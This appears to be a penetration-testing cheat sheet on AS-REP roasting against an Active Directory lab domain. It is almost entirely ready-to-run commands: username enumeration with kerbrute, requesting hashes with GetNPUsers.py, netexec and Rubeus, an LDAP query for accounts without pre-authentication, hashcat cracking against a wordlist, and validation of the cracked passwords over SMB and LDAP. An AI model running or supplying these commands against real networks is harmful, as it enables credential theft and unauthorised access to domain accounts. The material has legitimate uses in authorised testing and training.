AS-REP roasting targets user accounts that do not require Kerberos pre-authentication. We ask the domain controller for an AS-REP for the target account, save the encrypted response, and crack it offline.
Linux unauthenticated user list
kerbrute userenum -d ootw.local --dc 10.10.10.200 users.txt
GetNPUsers.py ootw.local/ -dc-ip 10.10.10.200 -usersfile users.txt -format hashcat -outputfile asrep.hashes
Linux with valid credentials
GetNPUsers.py ootw.local/student:'student' -dc-ip 10.10.10.200 -format hashcat -outputfile asrep.hashes
nxc ldap 10.10.10.200 -u student -p 'student' --asreproast asrep.hashes
Linux with NTLM
GetNPUsers.py ootw.local/student -dc-ip 10.10.10.200 -hashes :<NTLM_HASH> -format hashcat -outputfile asrep.hashes
Windows with Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:asrep.hashes
Rubeus.exe asreproast /user:target.user /format:hashcat /nowrap
LDAP confirmation
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName userAccountControl
Crack
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show
Validate
nxc smb 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local
nxc ldap 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local
Notes
AS-REP roasting does not require a password when we already have a valid username list. That makes username enumeration important. The attack only works when pre-authentication is disabled on the target account.
The useful output starts with $krb5asrep$23$. If no hashes come back, either the usernames are wrong, pre-authentication is enabled, or the domain controller is not reachable.